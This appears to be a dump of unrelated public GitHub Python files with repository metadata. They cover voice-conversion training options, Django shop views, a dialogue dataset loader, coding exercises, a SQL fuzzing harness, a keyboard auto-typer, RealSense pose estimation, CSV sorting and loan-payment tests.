CycleGAN model for datasets.')\n\n preprocessed_dir_default = './data/vcc2016_training/SF1'\n model_dir_default = './model/sf1_tf2'\n model_name_default = 'sf1_tf2.ckpt'\n random_seed_default = 0\n validation_A_dir_default = './data/evaluation_all/SF1'\n # validation_B_dir_default = './data/evaluation_all/TF2'\n validation_B_dir_default = None\n output_dir_default = './validation_output'\n # output_dir_default = './tf_2_version'\n tensorboard_log_dir_default = './log'\n load_model_weights = 'None'\n\n parser.add_argument('--preprocessed_dir', type = str, help = 'Directory for preprocessed dataset.', default = preprocessed_dir_default)\n parser.add_argument('--model_dir', type = str, help = 'Directory for saving models.', default = model_dir_default)\n parser.add_argument('--model_name', type = str, help = 'File name for saving model.', default = model_name_default)\n parser.add_argument('--random_seed', type = int, help = 'Random seed for model training.', default = random_seed_default)\n parser.add_argument('--validation_A_dir', type = str, help = 'Convert validation A after each training epoch. 
If set none, no conversion would be done during the training.', default = validation_A_dir_default)\n parser.add_argument('--validation_B_dir', type = str, help = 'Convert validation B after each training epoch. If set none, no conversion would be done during the training.', default = validation_B_dir_default)\n parser.add_argument('--output_dir', type = str, help = 'Output directory for converted validation voices.', default = output_dir_default)\n parser.add_argument('--tensorboard_log_dir', type = str, help = 'TensorBoard log directory.', default = tensorboard_log_dir_default)\n parser.add_argument('--load_model',type= str, help = 'Load weights from this directory', default = load_model_weights)\n parser.add_argument('--add_noise',type= bool, help = 'Load weights from this directory', default = False)\n argv = parser.parse_args()\n\n preprocessed_dir = argv.preprocessed_dir\n output_dir = argv.model_dir\n model_name = argv.model_name\n random_seed = argv.random_seed\n validation_A_dir = None if argv.validation_A_dir == 'None' or argv.validation_A_dir == 'none' else argv.validation_A_dir\n validation_B_dir = None if argv.validation_B_dir == 'None' or argv.validation_B_dir == 'none' else argv.validation_B_dir\n output_dir = argv.output_dir\n tensorboard_log_dir = argv.tensorboard_log_dir\n load_model_weights = None if argv.load_model == 'None' or argv.load_model == 'none' else argv.load_model\n add_noise = argv.add_noise\n\n train(train_dir = preprocessed_dir, model_dir = output_dir, model_name = model_name, random_seed = random_seed, validation_A_dir = validation_A_dir, validation_B_dir = validation_B_dir, output_dir = output_dir, tensorboard_log_dir = tensorboard_log_dir, model_weights_dir = load_model_weights,add_noise=add_noise)\n","repo_name":"IEEE-NITK/Voice-Swapper","sub_path":"tf_2_version/train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":12384,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"33459191439","text":"from django.urls import path\nfrom . 
import views\n\nurlpatterns = [\n path('', views.shop, name='shop'),\n # path('signup', views.signup, name='signup'),\n path('add_to_cart/', views.add_to_cart, name='add_to_cart'),\n path('remove_from_cart/', views.remove_from_cart, name='remove_from_cart'),\n path('store_cart', views.store_cart, name='store_cart'),\n path('checkout/', views.checkout, name='checkout'),\n path('checkout_ok/', views.checkout, name='order_success'),\n]\n","repo_name":"travoroguna/Africrafts","sub_path":"shop/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":506,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"20020935980","text":"\"\"\"@package views\nThis module provides a view to create an association.\n\"\"\"\nfrom django.http import HttpResponse, HttpResponseRedirect\nfrom django.shortcuts import render, redirect\nfrom core.models import Association\nfrom django.urls import reverse\nfrom django.contrib.auth.decorators import login_required\n\nfrom core.forms.association_create import association_form\n\n\n##\n# @brief Render and process a form to create an association.\n# @param request HTTP request.\n# @return Rendered web page.\n@login_required\ndef view(request):\n if request.method == 'POST':\n form = association_form(request.POST, request.FILES)\n if form.is_valid():\n asso = Association.objects.all().filter(\n name=form.cleaned_data['name'])\n if asso:\n form = association_form()\n return render(request, 'association_create.html', {\n 'form': form,\n 'fail': 'Cette association a déjà été créée'\n })\n\n association = Association()\n association.name = form.cleaned_data['name']\n association.website = form.cleaned_data['website']\n association.email = form.cleaned_data['email']\n association.logo = form.cleaned_data['logo']\n association.save()\n return render(request, 'association_create.html', {\n 'form': form,\n 'info': 'Votre association a bien été créée'\n })\n else:\n form = association_form()\n\n return render(request, 'association_create.html', {'form': form})\n","repo_name":"flomonster/ticket","sub_path":"core/views/association_create.py","file_name":"association_create.py","file_ext":"py","file_size_in_byte":1603,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"11306412075","text":"'''\nThe dataset of causal language modelling.\nBatch same sizes together such that we use minimal padding.\n'''\n\n\nimport datasets\nimport torch\n\nfrom torch.utils.data import Dataset, DataLoader\nimport itertools\nimport numpy as np\nfrom transformers import RobertaTokenizerFast\n\nflatten = itertools.chain.from_iterable\n\n\nclass CLMDataset(Dataset):\n\n def __init__(self, tokenizer, size=None, transform=None, split=\"train\", batch_size=16):\n self.original_dataset = datasets.load_dataset(\"daily_dialog\", split=split, )\n self.tokenizer = tokenizer\n # Next we process the dataset to split it up properly.\n self.size = size\n self.batch_size = batch_size\n self.dataset = self.process_dataset()\n\n def process_dataset(self):\n '''\n Batch same sizes together. 
To get minimal overhead when applying padding.\n '''\n sorted_results = self.get_sorted_samples()\n\n #### Naive way: pick\n final_samples = []\n\n current_sample_len = 0\n current_batch = []\n for r in sorted_results:\n\n if len(current_batch) == 0:\n current_batch.append(r)\n # Keep adding until the batch is full\n elif len(current_batch) >= self.batch_size:\n final_samples.append(current_batch)\n current_batch = [r]\n # We simply add to the batch\n else:\n current_batch.append(r)\n\n if self.size:\n final_samples = final_samples[:self.size]\n\n ### Lastly we must make sure the padding is there. Hence we decode and than batch encode to automatically pad the samples.\n result = []\n for final_sample in final_samples:\n temp = [' '.join(s) for s in final_sample]\n if type(self.tokenizer) != RobertaTokenizerFast:\n\n result.append(torch.stack([enc.ids for enc in self.tokenizer.encode_batch(temp)]))\n else:\n result.append(torch.tensor(self.tokenizer(temp, padding=True, add_special_tokens=False).input_ids))\n return result\n\n def get_sorted_samples(self):\n '''\n Sorts the samples in lists of approximatly the same size.\n '''\n dialogues = ['[START] ' + '[SEP]'.join(dialogue[\"dialog\"]) for dialogue in self.original_dataset]\n\n if type(self.tokenizer) != RobertaTokenizerFast:\n dialogues = ['[START] ' + '[SEP]'.join(dialogue[\"dialog\"]) for dialogue in self.original_dataset]\n\n tokenized_dataset = [self.tokenizer.encode(sample).tokens for sample in dialogues]\n else:\n dialogues = ['[START] ' + ''.join(dialogue[\"dialog\"]) for dialogue in self.original_dataset]\n\n tokenized_dataset = [self.tokenizer.tokenize(sample) for sample in dialogues]\n sorted_results = sorted(tokenized_dataset, key=lambda x: len(x))\n\n # Next we create lists of utterances that are approximatly the same size. 
We shuffle the utterances within such a list.\n # This has a result that when we batch them we end up with batches that have utterances of approximatly the same length.\n results = []\n current = []\n current_len = len(sorted_results[0])\n for r in sorted_results:\n if abs(current_len - len(r)) <= 15:\n current.append(r)\n else:\n # shuffle the set itself.\n np.random.shuffle(current)\n results += current\n current = [r]\n current_len = len(r)\n return results\n\n def reshuffle_dataset(self):\n '''\n Reshuffles the dataset\n '''\n self.dataset = self.process_dataset()\n\n def __len__(self):\n return len(self.dataset)\n\n def __getitem__(self, idx):\n return self.dataset[idx]\n","repo_name":"gersonfoks/rational-dialog-model","sub_path":"misc/old/CLMDataset.py","file_name":"CLMDataset.py","file_ext":"py","file_size_in_byte":3810,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"2513786446","text":"# submission: https://leetcode.com/submissions/detail/282036526/\n\nclass Solution:\n def climbStairs(self, n: int) -> int:\n memo = [0]*n\n return self.fibo_dp(0,n,memo)\n\n def fibo_dp(self,i, n, memo):\n if i>n:\n return 0\n if i == n: \n return 1\n if memo[i] > 0:\n return memo[i]\n memo[i] = self.fibo_dp(i+1,n,memo) + self.fibo_dp(i+2,n,memo)\n return memo[i]\n","repo_name":"toad0475/Algorithm_Greenhorns","sub_path":"toad0475/Climbing_Stairs.py","file_name":"Climbing_Stairs.py","file_ext":"py","file_size_in_byte":440,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"18"} +{"seq_id":"70736579560","text":"import numpy as np\nfrom System_Objects import *\nimport pandas as pd\nfrom Menu import ViewFileName\n\n# ---------------------------------------------------------------------------------------#\n# This script reads the system data from an Excel-file, and builds the objects for the system.\n# ---------------------------------------------------------------------------------------#\n\n\ndef System_Setup():\n \"\"\"Function to build the system as described in the Excel-file. 
Returns a list of buses and lines.\"\"\"\n\n # Read data from excel file\n file = ViewFileName(filext=\"xlsx\")\n xls = pd.ExcelFile(file)\n bval = pd.read_excel(xls, 'Bus')\n bval = bval.values\n lval = pd.read_excel(xls, 'Branch')\n lval = lval.values\n\n # Crate lists for buses and branches\n Buses = []\n Lines = []\n\n # Fill in information from the Excel-file\n for row in bval:\n bus = Bus(row)\n Buses.append(bus)\n\n for row in lval:\n line = Line(row)\n Lines.append(line)\n\n return Buses, Lines\n","repo_name":"alvaroyasater/ELK14","sub_path":"Assignments/System_Setup.py","file_name":"System_Setup.py","file_ext":"py","file_size_in_byte":1016,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"35806423665","text":"\"\"\"Pls do `pip install -r requirements.txt` in terminal\"\"\"\nimport keyboard\nimport simpleaudio as sa\nimport threading\nimport time\nimport os\n\ndelay = 0.01\nstartKey = 'home'\nexitKey = 'escape'\nfilePath = 'Copy.py'\ntypingSoundFilePath = 'Sounds/Typing.wav'\nendSoundFilePath = 'Sounds/kill.wav'\nrequireEndSound = False\nrequireExit = False\nrequireTimer = True\nloop = True\n\nstart = False\nend = False\nfile = open(filePath, 'r', encoding='utf8')\nlines = file.readlines()\ncounter = 0\ntimer = 0\ntimeCount = True\n\ndef IsActive(name):\n if name not in [thread.name for thread in threading.enumerate()]:\n return False\n return True\n\ndef Exit():\n global start\n global end\n while True:\n if keyboard.is_pressed(exitKey):\n start = False\n end = True\n break\n\ndef Playsound(path):\n wave_object = sa.WaveObject.from_wave_file(path)\n play_object = wave_object.play()\n play_object.wait_done()\n\ndef Typing():\n global start\n while start:\n if requireTimer:\n threading.Thread(target=Timer, daemon=True).start()\n for line in lines:\n for char in line:\n if not start:\n return\n if not IsActive('typing'):\n threading.Thread(target=Playsound, args=[typingSoundFilePath,], daemon=True, name='typing').start()\n keyboard.write(char)\n time.sleep(delay)\n start = False\n\ndef StartTyping():\n global start\n global counter\n global timer\n global timeCount\n pressed = False\n while not start and not end:\n if keyboard.is_pressed(startKey):\n pressed = True\n if pressed and not keyboard.is_pressed(startKey):\n start = True\n Typing()\n if requireEndSound:\n sa.stop_all()\n Playsound(endSoundFilePath)\n sa.stop_all()\n if not end:\n counter += 1\n message = f'Total Task completed: {counter} time'\n if counter > 1:\n message += 's'\n print(f'{message}!')\n if requireTimer:\n message = f'Task completed in {timer} sec'\n if timer > 1:\n message += 's'\n print(f'{message}!')\n timeCount = False\n\ndef Timer():\n global timer\n global timeCount\n timer = 0\n timeCount = True\n while timeCount:\n time.sleep(1)\n timer += 1\n\ndef main():\n os.system('clear||cls')\n message = f'Click `{startKey}` key to start auto type.'\n if requireExit:\n message = ''.join(list(message)[:-1])\n message += f', click `{exitKey}` to stop auto type.'\n print(message)\n if requireExit:\n threading.Thread(target=Exit, daemon=True).start()\n StartTyping()\n while loop:\n if end:\n break\n StartTyping()\n\nif __name__ == \"__main__\":\n main()\n print('Task ended!')\n\n\"\"\"\n*** If you want to use the auto typer in VS Code, pls copy the texts below to settings.json***\n \"editor.autoIndent\": \"none\",\n \"editor.autoClosingBrackets\": \"never\",\n \"editor.acceptSuggestionOnEnter\": 
\"off\"\n\"\"\"","repo_name":"BenjaminThio/auto-typer","sub_path":"AutoTyper.py","file_name":"AutoTyper.py","file_ext":"py","file_size_in_byte":3085,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"18"} +{"seq_id":"73309726439","text":"import subprocess\nimport sys\nfrom cd import cd\nimport call\n\ndef exit(code):\n\tsys.exit(code)\n\ndef appendToFile(directory, fileName, content):\n\tif not(content.isspace()) and content: #not empty or spaces\n\t\twith cd(directory):\n\t\t\twith open(fileName, \"a\") as f:\n\t\t\t\tf.write('\\n' + content.strip() + '\\n\\n')\n\ndef errorDump(message, output):\n\tif not(output.isspace()) and output:\n\t\tcombinedOutput = message + '\\n-----\\n' + output.strip()\n\t\tappendToFile(\"errors\", seed, combinedOutput)\n\ntry:\n\tseed = sys.argv[1]\nexcept IndexError:\n\tseed = \"0\"\n\n#generate a basic query\nout = call.cmd([\"python gen-query.py \" + seed])\nerrorDump(\"error in query generation\", out[1])\nappendToFile(\"queries\", seed, out[0])\ncall.cmd([r\"sed -i 's/(/\\n(\\n/g;s/)/\\n)\\n/g' queries/\" + seed])\n\n#fuzz query\nwith cd(\"/home/calli/project/antlr4/\"):\n\tqueryFile = \"~/project/scripts/queries/\" + seed\n\tout = call.cmd([\"java fuzzer.Main \" + seed + \" \" + queryFile])\nerrorDump(\"error in query fuzzing\", out[1])\nappendToFile(\"fuzzed\", seed, out[0])\n\n#run mysql\nout = call.cmd([\"mysql -h 127.0.0.1 -P 19300 -u root -D test -N -B < fuzzed/\" + seed])\nerrorDump(\"error in mysql\", out[1])\nappendToFile(\"mysql_logs\", seed, out[0])\ncall.cmd([\"sort mysql_logs/\" + seed + \" -o mysql_logs/\" + seed])\ncall.cmd([\"sed -i -- 's/NULL/ /g' mysql_logs/\" + seed])\n\n#run sqlite\nout = call.cmd([\"sqlite3 db.sqlite -column < fuzzed/\" + seed])\nerrorDump(\"error in sqlite\", out[1])\nappendToFile(\"sqlite_logs\", seed, out[0])\ncall.cmd([\"sort sqlite_logs/\" + seed + \" -o sqlite_logs/\" + seed])\n\n#find diff\nout = call.cmd([\"cmp mysql_logs/\" + seed + \" sqlite_logs/\" + seed])\nerrorDump(\"error in diff\", out[1])\nappendToFile(\"diff\", seed, out[0])\n","repo_name":"calvin-li/antlr4-mysql","sub_path":"scripts/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1677,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"18"} +{"seq_id":"72907809639","text":"import os\nimport matplotlib.pyplot as plt\nfrom parallelrun import ParallelProcessor as P\nimport numpy as np\n\n\nclass c12(object):\n def __init__(self):\n path = '/home/kaho/kepshot_carbon/'\n _allp = os.listdir(path)\n qb = []\n mdot = []\n c12 = []\n for i in _allp:\n p = P.load(path+i)\n qb.extend(p.Qb)\n mdot.extend(p.mdot)\n c12.extend(p.abub[6,12])\n plt.scatter(mdot, qb, s=np.ones(len(c12))*30, c=c12)\n cb = plt.colorbar()\n cb.set_label(label='Carbon mass fraction', fontsize = 15)\n plt.ylabel('Base luminosity / $\\dot{m}$ (MeV/u)', fontsize=15)\n plt.xlabel('$\\dot{M}_{\\mathrm{Edd}}$', fontsize=15)\n plt.ylim(0.5, 0.7)\n plt.xlim(0.07, 0.105)\n plt.tick_params(labelsize=13)\n cb.update_ticks(labelsize=13)\n plt.show()\n\t","repo_name":"kahoTT/krepo1","sub_path":"scatter_abu.py","file_name":"scatter_abu.py","file_ext":"py","file_size_in_byte":872,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"29907089406","text":"\"\"\"\nGiven an array of integers sorted in ascending order, find the starting and ending position of a given target value.\n\nYour algorithm's runtime complexity must be in the order of O(log 
n).\n\nIf the target is not found in the array, return [-1, -1].\n\nFor example,\nGiven [5, 7, 7, 8, 8, 10] and target value 8,\nreturn [3, 4].\n\"\"\"\nclass Solution:\n def searchIndex(self, nums, target):\n \"\"\"\n :type nums: List[int]\n :type target: int\n :rtype: List[int]\n \"\"\"\n if (not nums) or nums[0]>=target:\n return -1\n if nums[-1]= target:\n right = mid-1\n\n if nums[left]>=target:\n return left-1\n else:\n return left\n\nif __name__ == '__main__':\n s = Solution()\n nums = [3,5, 6,6,7, 7,7,7,8, 8, 9,9,9,10]\n nums = [3]\n # nums = [1]\n # nums = []\n print(s.searchIndex(nums,4))\n\n print(list(enumerate(nums)))\n\n \n print('z'<'b')\n\n\n\n","repo_name":"Mang0o/leetcode","sub_path":"binary search/search biggest element smaller than k.py","file_name":"search biggest element smaller than k.py","file_ext":"py","file_size_in_byte":1159,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"39406738321","text":"import pyrealsense2 as rs\n# Import Numpy for easy array manipulation\nimport numpy as np\n# Import OpenCV for easy image rendering\nimport cv2\n\nimport tensorflow as tf\nfrom tensorflow.keras.applications.resnet50 import preprocess_input\nimport keras\nfrom keras import layers, models\nimport os\nfrom pathlib import Path\nfrom keras.models import model_from_json\nimport time\n\n\n\n#from sklearn.model_selection import train_test_split\nos.environ['KMP_DUPLICATE_LIB_OK']='True'\nos.environ['MKL_NUM_THREADS'] = '16'\nos.environ['GOTO_NUM_THREADS'] = '16'\nos.environ['OMP_NUM_THREADS'] = '16'\nos.environ['openmp'] = 'True'\n\n# Get RGB Patches\ndef get_Patches_data(rgbImg,zDepth):\n \n \n \n # Extract SURF KP\n surf_HS = 1500\n surf = cv2.xfeatures2d.SURF_create(surf_HS)\n kp,des = surf.detectAndCompute(rgbImg,None)\n #print('Number of Keypoints detected :',len(kp))\n nb_KP = len(kp)\n nb_good_patch = nb_KP\n\n\n #kp_nz_D = []\n Patches_RGB = []\n Patches_2D = []\n patch_size = 25\n\n for i in range(len(kp)):\n #Patch RGB\n kp_rgb = np.array(rgbImg[int(kp[i].pt[1])-patch_size:int(kp[i].pt[1])+patch_size,\n int(kp[i].pt[0])-patch_size:int(kp[i].pt[0])+patch_size])\n #Patch 2D homogeneaous\n kp_homg_2D = np.array(kp[i].pt).tolist()\n kp_homg_2D.append(1)\n kp_homg_2D = np.asarray(kp_homg_2D).reshape(-1,1)\n\n #Patch Depth\n kp_Di = zDepth[int(kp[i].pt[1]),int(kp[i].pt[0])]\n # Remove patches without good shape (50,50,3) and with Depth = 0\n if (kp_Di!=0 and kp_rgb.shape == (patch_size*2,patch_size*2,3)):\n nb_good_patch = nb_good_patch - 1\n Patches_2D.append(kp_homg_2D)\n Patches_RGB.append(kp_rgb)\n #kp_nz_D.append(kp[i])\n nb_ptch = nb_KP-nb_good_patch\n print('Number of Good Patches : ', nb_ptch)\n \n return Patches_RGB,Patches_2D,nb_ptch\n\ndef draw_box(frame,imgPoints,color):\n frame = cv2.line(frame,(imgPoints[0].tolist()),(imgPoints[1].tolist()),color,3)\n frame = cv2.line(frame,(imgPoints[0].tolist()),(imgPoints[4].tolist()),color,3)\n frame = cv2.line(frame,(imgPoints[0].tolist()),(imgPoints[3].tolist()),color,3)\n frame = cv2.line(frame,(imgPoints[4].tolist()),(imgPoints[5].tolist()),color,3)\n frame = cv2.line(frame,(imgPoints[4].tolist()),(imgPoints[7].tolist()),color,3)\n frame = cv2.line(frame,(imgPoints[5].tolist()),(imgPoints[1].tolist()),color,3)\n frame = cv2.line(frame,(imgPoints[5].tolist()),(imgPoints[6].tolist()),color,3)\n frame = cv2.line(frame,(imgPoints[2].tolist()),(imgPoints[3].tolist()),color,3)\n frame = cv2.line(frame,(imgPoints[2].tolist()),(imgPoints[1].tolist()),color,3)\n frame = 
cv2.line(frame,(imgPoints[6].tolist()),(imgPoints[2].tolist()),color,3)\n frame = cv2.line(frame,(imgPoints[6].tolist()),(imgPoints[7].tolist()),color,3)\n frame = cv2.line(frame,(imgPoints[7].tolist()),(imgPoints[3].tolist()),color,3)\n return frame\n\npath_model = \"Evaluation_Data_Test/box_train\"\n# Load CNN regression model\nf = Path(f'{path_model}/_3dNet_Save_3/_3dNet__structure.json')\n_3dNet_structure = f.read_text()\n# Recréer l'objet du model Keras à partir des données json\n_3dNet_ = model_from_json(_3dNet_structure)\n# Recharger les poids entraînés du model\n_3dNet_.load_weights(f\"{path_model}/_3dNet_Save_3/_3dNet__weights.h5\")\n#load history \n_3dNet_history = np.load(f'{path_model}/_3dNet_Save_3/_3DNet_History.npy',allow_pickle=True).flatten()[0]\n\n\n#img_indexes = np.loadtxt('./pyrealsense2/img_indices.txt')\n# Create a pipeline\npipeline = rs.pipeline()\n\n# Create a config and configure the pipeline to stream\n# different resolutions of color and depth streams\nconfig = rs.config()\n\n# Get device product line for setting a supporting resolution\npipeline_wrapper = rs.pipeline_wrapper(pipeline)\npipeline_profile = config.resolve(pipeline_wrapper)\ndevice = pipeline_profile.get_device()\ndevice_product_line = str(device.get_info(rs.camera_info.product_line))\n\nfound_rgb = False\nfor s in device.sensors:\n if s.get_info(rs.camera_info.name) == 'RGB Camera':\n found_rgb = True\n break\nif not found_rgb:\n print(\"The demo requires Depth camera with Color sensor\")\n exit(0)\n\nconfig.enable_stream(rs.stream.depth, 640, 480, rs.format.z16, 30)\n#config.enable_stream(rs.stream.pose)\n\nif device_product_line == 'L500':\n config.enable_stream(rs.stream.color, 960, 540, rs.format.bgr8, 30)\nelse:\n config.enable_stream(rs.stream.color, 640, 480, rs.format.bgr8, 30)\n\n# Start streaming\nprofile = pipeline.start(config)\n\n# Getting the depth sensor's depth scale (see rs-align example for explanation)\ndepth_sensor = profile.get_device().first_depth_sensor()\ndepth_scale = depth_sensor.get_depth_scale()\nprint(\"Depth Scale is: \" , depth_scale)\n\n\n\n\n# We will be removing the background of objects more than\n# clipping_distance_in_meters meters away\nclipping_distance_in_meters = 1 #1 meter\nclipping_distance = clipping_distance_in_meters / depth_scale\n\n# Create an align object\n# rs.align allows us to perform alignment of depth frames to others frames\n# The \"align_to\" is the stream type to which we plan to align depth frames.\nalign_to = rs.stream.color\nalign = rs.align(align_to)\n\n# Streaming loop\nnb_frames = 1500\ntry:\n i=0\n while nb_frames>0:\n # Get frameset of color and depth\n frames = pipeline.wait_for_frames()\n # frames.get_depth_frame() is a 640x360 depth image\n\n # Align the depth frame to color frame\n aligned_frames = align.process(frames)\n\n # Get aligned frames\n aligned_depth_frame = aligned_frames.get_depth_frame() # aligned_depth_frame is a 640x480 depth image\n color_frame = aligned_frames.get_color_frame()\n\n #color_intrinsics = color_frame.profile.as_video_stream_profile().intrinsics\n #print(\"color_intrinsics = \" ,color_intrinsics)\n\n #depth_intrinsics = aligned_depth_frame.profile.as_video_stream_profile().intrinsics\n #print(\"depth_intrinsics = \" ,depth_intrinsics)\n\n\n color_image = np.asanyarray(color_frame.get_data())\n depth_image = np.asanyarray(aligned_depth_frame.get_data())\n depth_m = depth_image.astype(float) * depth_scale\n ###### Patch 2D_3D Extraction ########\n _RGB_Patches,_2D_Patches,NB_Patches = 
get_Patches_data(cv2.cvtColor(color_image,cv2.COLOR_BGR2RGB),depth_m)\n _RGB_Patches = np.asarray(_RGB_Patches)\n _2D_Patches = np.asarray(_2D_Patches)[:,:2,:].reshape(-1,2)\n\n ###### 3DNet Prediction ########## \n frame_i_norm_Patches = preprocess_input(_RGB_Patches)\n frame_i_GT_2D = _2D_Patches\n frame_i_Pred_3D = _3dNet_.predict(frame_i_norm_Patches)\n frame_i = np.copy(color_image)\n \n\n ####### PnPRansac Pose Estimation ######### \n K = np.asarray([[606.209,0,320.046],\n [0,606.719,238.926],\n [0,0,1]],np.float32)\n retval, rvec, tvec, inliers= cv2.solvePnPRansac(frame_i_Pred_3D,\n frame_i_GT_2D,\n K,\n np.array([]),\n #reprojectionError=7,\n #iterationsCount= 1000\n )\n\n ######### Levenberg-Marquardt Pose Refinement #######\n criteria = (cv2.TERM_CRITERIA_EPS + cv2.TERM_CRITERIA_COUNT + cv2.TERM_CRITERIA_MAX_ITER,20,1)\n for l in range(500):\n rvecLM,tvecLM= cv2.solvePnPRefineLM(frame_i_Pred_3D,\n frame_i_GT_2D,\n K,\n np.array([]),\n rvec, \n tvec,\n criteria=criteria\n )\n\n ######## Box AR Reconstruction #######\n objPoints = np.array([[0,90,0],\n [125,90,0],\n [125,90,70],\n [0,90,70],\n [0,0,0],\n [125,0,0],\n [125,0,70],\n [0,0,70]],np.float64).reshape((-1,1,3)) * 1e-3\n projected_box_LMPose = cv2.projectPoints(objPoints,rvecLM,tvecLM,K,np.array([]))[0]\n \n\n for _2d_LM in projected_box_LMPose:\n a1,b1 = _2d_LM.ravel()\n frame_i = cv2.circle(frame_i,(int(a1),int(b1)),9,[255,0,0],-1)\n\n frame_i = draw_box(frame_i,np.asarray(projected_box_LMPose,np.int32).reshape(-1,2),(255,0,0))\n \n # Validate that both frames are valid\n if not aligned_depth_frame or not color_frame:\n continue\n \n # Render images:\n # depth align to color on left\n # depth on right\n depth_colormap = cv2.applyColorMap(cv2.convertScaleAbs(depth_image, alpha=0.03), cv2.COLORMAP_JET)\n images = np.hstack((frame_i, depth_colormap))\n #cv2.imwrite(f\"./pyrealsense2/data15/frame-{i:06}-depth.png\", depth_colormap)\n #cv2.imwrite(f\"./pyrealsense2/data15/frame-{i:06}-rgb.png\", color_image)\n #np.savetxt(f'./pyrealsense2/data15/frame-{i:06}-zDepth.txt',depth_m)\n i=i+1\n nb_frames = nb_frames-1\n cv2.namedWindow('Align Example', cv2.WINDOW_NORMAL)\n cv2.imshow('Align Example', images)\n key = cv2.waitKey(1)\n # Press esc or 'q' to close the image window\n if key & 0xFF == ord('q') or key == 27:\n cv2.destroyAllWindows()\n break\nfinally:\n pipeline.stop()\n","repo_name":"moumed/Smart-3D-Camera-Pose-Estimation-for-Complex-Augmented-Reality-Environments-Using-Deep-Learning-Techn","sub_path":"[3_TOUIL][Annexe_1][3DNet-Code-main]/6-3DNetRealTime.py","file_name":"6-3DNetRealTime.py","file_ext":"py","file_size_in_byte":9815,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"25110797962","text":"import os\r\nimport csv\r\n\r\n\r\ndef printlist(mylist):\r\n for x in mylist:\r\n print(x)\r\n\r\n\r\ndef sort_cost(mylist, sign, quantity):\r\n for x in mylist:\r\n if sign == '>':\r\n if int(x[\"Likes\"]) > quantity:\r\n print(x)\r\n elif sign == '<':\r\n if int(x[\"Likes\"]) < quantity:\r\n print(x)\r\n elif sign == '!=':\r\n if x[\"Likes\"] != quantity:\r\n print(x)\r\n elif sign == '>=':\r\n if int(x[\"Likes\"]) >= quantity:\r\n print(x)\r\n elif sign == '<=':\r\n if int(x[\"Likes\"]) <= quantity:\r\n print(x)\r\n elif sign == '==':\r\n if x[\"Likes\"] == quantity:\r\n print(x)\r\n\r\n\r\ndef sort_name(mylist):\r\n print(\"Сортировка по названию(по убыванию):\")\r\n mylist.sort(key=lambda x: x['Name'])\r\n printlist(mylist)\r\n\r\n\r\ndef 
sort_like(mylist):\r\n print(\"Сортировка по стоимости(по убыванию):\")\r\n mylist.sort(key=lambda x: int(x['Likes']))\r\n new_list = list(reversed(mylist))\r\n printlist(new_list)\r\n\r\n\r\nif __name__ == '__main__':\r\n print(\"Количество файлов в директории:\", len(os.listdir(path=\".\")))\r\n mylist = {}\r\n with open(\"data.csv\", newline='') as file:\r\n reader = csv.DictReader(file, delimiter=\";\")\r\n mylist = [row for row in reader]\r\n key = int(\r\n input(\"Введите \\n1 - если хотите увидеть сортировку файла по именам в алфавитном порядке, \\n2 - если хотите \"\r\n \"увидеть сортировку по лайкам по возрастанию, \\n3 - если хотите увидеть только строки с определённым \"\r\n \"количеством лайков, \\n4 - если просто хотите вывести все строки\\n\")\r\n )\r\n if key == 1:\r\n sort_name(mylist)\r\n elif key == 2:\r\n sort_like(mylist)\r\n elif key == 3:\r\n sign = input(\"Введите знак с сравнения. Вот список знаков: >, <, >=, <=, ==, !=\\n\")\r\n quantity = int(input(\"Введите количество с которым хотите сравнивать\\n\"))\r\n print(\"Вывод по условию(стоимость\", sign, \" \", quantity, \": \")\r\n sort_cost(mylist, sign, quantity)\r\n elif key == 4:\r\n printlist(mylist)\r\n\r\n print(\"Введите:\\n1 - Если хотите сохранить в файл\\n0 - Если не хотите сохранять в файл\")\r\n check = int(input())\r\n if check == 1:\r\n fields = [\"п»їNumber\", \"Name\", \"Text\", \"Likes\"]\r\n with open('output.csv', 'w', newline='') as file:\r\n writer = csv.DictWriter(file, fieldnames=fields)\r\n writer.writeheader()\r\n for row in mylist:\r\n writer.writerow(row)\r\n print(\"Сохранение завершено\")\r\n else:\r\n exit()\r\n","repo_name":"MMidaVV/Development-of-professional-applications","sub_path":"lab3/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3092,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"29881249340","text":"# test_friend.py\n\n# assert expression\n## if true nothing happens\n## if false raises AssertionError\n\n# create virtual environment and activate\n# pip install pytest\n# pip install pytest-cov\n\n# run tests with python -m pytest -s\n# compare -s and -v when running the tests\n# run coverage tests with python -m pytest --cov\n\nfrom datetime import date \nimport pytest\nfrom oop_loan_pmt import Loan, collectLoanDetails, main\n\n\n# Unit tests for Loan class\ndef test_discount_factor_calculation():\n #\n #GIVEN a user enters their loan details\n #WHEN the details are entered correctly\n #THEN the discount factor is calculated accurately\n #\n loan = Loan(100000, 30, 0.06)\n loan.calculateDiscountFactor()\n print(\"\\r\") # carriage return\n print(\" -- discount_factor_calculation unit test\")\n assert loan.getDiscountFactor() == pytest.approx(166.7916, rel=1e-2)\n\ndef test_loan_payment_calculation():\n #\n #GIVEN a user enters their loan details\n #WHEN a user enters their loan details correctly \n #THEN the loan payment is accurately calculated\n #\n loan = Loan(100000, 30, 0.06)\n loan.calculateLoanPmt()\n print(\"\\r\") # carriage return\n print(\" -- loan_payment_calculation unit test\")\n assert loan.getLoanPmt() == pytest.approx(599.55, rel=1e-2)\n\n# Functional tests 